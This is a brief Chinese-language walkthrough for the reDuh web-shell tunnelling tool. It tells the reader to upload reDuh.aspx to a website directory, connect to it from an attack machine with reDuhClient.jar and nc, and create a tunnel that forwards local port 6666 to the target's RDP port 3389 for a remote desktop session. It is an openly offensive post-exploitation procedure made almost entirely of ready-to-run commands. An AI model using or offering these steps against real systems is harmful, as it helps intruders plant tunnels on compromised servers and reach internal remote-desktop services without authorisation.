1.将reDuhServers\reDuh.aspx上传到网站目录
2.攻击机使用reDuhClient\dist\reDuhClient.jar连接刚刚上传的reDuh.aspx文件,会在本地生成一个1010端口
java -jar reDuhClient.jar http://192.168.1.105/reDuh.aspx
3.攻击机使用nc连接本地的1010端口
nc1.exe -nvv 127.0.0.1 1010
4.nc连接后进行配置端口转发
[createTunnel]6666:127.0.0.1:3389
5.直接连接本机的6666端口即可(mstsc远程,127.0.0.1:6666)